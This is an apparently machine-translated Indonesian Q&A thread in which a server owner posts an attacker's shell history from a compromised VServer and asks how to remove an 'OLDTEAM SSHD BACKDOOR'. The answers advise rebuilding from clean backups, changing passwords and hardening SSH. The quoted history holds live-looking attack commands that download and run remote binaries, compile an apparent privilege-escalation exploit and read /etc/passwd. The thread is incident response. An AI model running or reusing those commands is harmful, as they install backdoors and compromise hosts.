Pertanyaan Ditemukan SSH Backdoor di VServer. Apa yang harus dilakukan?


Kemarin saya memeriksa sejarah perintah saya di VServer saya. Saya menemukan beberapa baris yang mencurigakan.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Terutama sniffer.tgz mengejutkanku. Saya menyiapkan mesin virtual dan mengunduh arsip tgz ini. Saya memulai setup dan itu memberi saya garis-garis ini:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Adakah yang tahu cara menghapus ini?


24
2018-03-05 19:39


asal


Terkait: serverfault.com/questions/218005/…, security.stackexchange.com/questions/24195/… - Mark


Jawaban:


Inilah yang harus Anda lakukan pada semua sistem yang Anda miliki ini sniffer.tgz di: Nuke Mereka Dari Orbit segera, dan mulai dari instalasi yang bersih. (Yaitu, hancurkan sistem, instal ulang bersih, muat data dari bersih backup - dengan asumsi Anda memiliki backup yang bersih, dan kemudian mengeraskan sistem sebelum mengembalikannya ke Internet).

Setiap kali Anda memiliki malware atau peretas masuk ke sistem Anda seperti ini, sudah waktunya untuk menganalisa kembali bagaimana sistem Anda dikonfigurasi dan pastikan untuk tidak ulangi langkah yang sama dengan yang mereka lakukan. Namun, karena ini mungkin bukan sistem, Anda memiliki kemampuan untuk menyisihkan dan menganalisis secara forensik, dan karena ini mungkin satu-satunya server Anda, inilah waktunya untuk menghancurkan sistem virtual, dan mulai dari awal (seperti yang saya katakan di atas).

(Dan ini berlaku untuk setiap situasi di mana Anda mendapatkan malware pada sistem. Kecuali Anda memiliki perangkat keras cadangan untuk mengganti sesuatu seperti ini sehingga Anda dapat mengisolasi dan secara forensik memeriksa sistem yang dilanggar, yang biasanya kebanyakan pengguna tidak miliki, Anda tidak punya pilihan selain untuk menghisap sistem dan memulai kembali.)

Tanpa menganalisa server Anda, saya tidak bisa benar-benar mengatakan apa yang Anda lakukan salah, tetapi kemungkinan backdoor ini lebih dalam di dalam sistem daripada hanya 'program' sederhana yang diinstal. Dan, karena orang-orang jahat sudah menginstal backdoor pada sistem Anda, Anda dapat mengasumsikan bahwa semua kata sandi Anda sekarang dilanggar dan tidak lagi aman (apakah itu untuk SSH, atau root MySQL, atau jenis kata sandi lain yang pernah ada dimasukkan ke dalam sistem komputer ini). Waktunya berubah semua kata sandi Anda!


Setelah Anda kembali dalam lingkungan yang bersih, berikut beberapa kiat dasar tentang langkah-langkah pengerasan yang perlu dipertimbangkan. Perhatikan bahwa karena ini membuatnya menjadi topik yang jauh lebih luas, saya tidak dapat benar-benar menggali detail di sini, tetapi sudah pasti waktu untuk melakukan beberapa langkah pengerasan untuk melindungi sistem Anda:

  1. Hidupkan firewall, dan hanya mengizinkan akses ke port yang perlu dibuka. ufw ada untuk menjadi sederhana, jadi mari kita gunakan itu. sudo ufw enable. (Mengkonfigurasi ufw benar untuk lingkungan Anda adalah cerita yang berbeda, dan itu melampaui batas-batas pertanyaan ini.)

  2. Batasi akses ke SSH jarak jauh. Ini tidak selalu bisa dilakukan, tetapi Anda idealnya akan mengidentifikasi alamat IP yang dimiliki oleh Anda dan secara khusus memasukkannya ke daftar putih di firewall. (Jika Anda berada di alamat IP perumahan dinamis, lewati langkah ini).

  3. Kunci akses SSH ke server Anda, dan mensyaratkan penggunaan kunci SSH hanya untuk otentikasi. Dengan cara ini, peretas tidak dapat menyerang server Anda dan mencoba dan hanya kira kata sandi. Jauh lebih sulit untuk menebak kunci privat yang tepat (karena Anda harus mem-bruteforce semuanya), dan ini membantu melindungi dari serangan bruteforcing.

  4. Jika Anda menjalankan situs web, pastikan untuk mengunci izin sehingga orang tidak dapat mengunggah / melakukan hal-hal di waktu luang mereka. Melakukan hal ini bervariasi dari situs ke situs, jadi saya tidak bisa memberi Anda panduan lebih lanjut di sini (tidak mungkin melakukannya).

  5. Juga jika Anda menjalankan situs web menggunakan Joomla atau Wordpress atau semacam itu, pastikan Anda menjaga lingkungan selalu diperbarui dan ditambal dengan kerentanan keamanan dari penyedia perangkat lunak.

  6. Di mana mungkin, mengatur, mengkonfigurasi, dan menggunakan metode otentikasi dua faktor (2FA) untuk hal-hal yang Anda autentikasi. Ada banyak solusi untuk otentikasi faktor kedua untuk aplikasi yang berbeda, dan mengamankan berbagai aplikasi dengan cara ini berada di luar cakupan posting ini, jadi Anda harus melakukan penelitian Anda tentang hal ini sebelum Anda memilih solusi.

  7. Jika kamu pasti harus gunakan kata sandi dalam pengaturan Anda, gunakan pengelola kata sandi yang layak (yang berbasis cloud tidak selalu merupakan pilihan yang baik) dan gunakan kata sandi panjang (25+ karakter), acak, tidak rumit yang berbeda untuk masing-masing item yang dijamin dengan kata sandi ( maka rekomendasi untuk pengelola kata sandi). (Namun, Anda harus sangat mempertimbangkan TIDAK menggunakan kata sandi jika mungkin (seperti untuk otentikasi SSH), dan gunakan 2FA jika mungkin).


68
2018-03-05 20:02



Komentar bukan untuk diskusi panjang; percakapan ini telah terjadi pindah ke obrolan. - terdon♦
Saya menerima jawabannya, karena inilah yang akan saya lakukan. Tidak pernah saya mencoba untuk menutup Backdoor di VM, hanya untuk kepentingan pribadi saya. - itskajo


Jika ada satu backdoor ada 3 lagi. Mengisolasi, mencadangkan data, mencabutnya, dan mengembalikan data dengan hati-hati. Hati-hati dengan data cron, php, atau bahkan mysql, semuanya dapat dikompromikan. Ingat pada titik ini mereka memiliki semua kata sandi dan hash Anda, jadi jika mesin lain juga dikonfigurasikan, mereka mungkin meretasnya juga ... Bagian yang sulit adalah mencari tahu bagaimana mereka memulai. Jika Anda memiliki tampilan WordPress untuk malware di plugin / tema, dll. Periksa izin Anda, Anda mungkin memiliki 777 di mana-mana. Tidak ada jawaban sederhana, Anda melihat banyak pekerjaan.


0
2018-03-06 22:57



Tidak selalu ada lebih dari satu, betapapun sering atau mungkin itu mungkin tidak terjadi di sini. Dan mereka mungkin tidak memiliki semua kata sandinya dengan pasti. Juga tidak mungkin "mereka telah meretas mesin lain, Anda tidak tahu niat mereka atau apa yang diendus, atau jika program yang buruk itu bahkan diaktifkan di luar hadir atau berlari dengan cara tertentu. Dan "mengembalikan data dengan hati-hati" adalah saran yang sangat umum untuk sesuatu yang membutuhkan tindakan yang sangat teliti. - James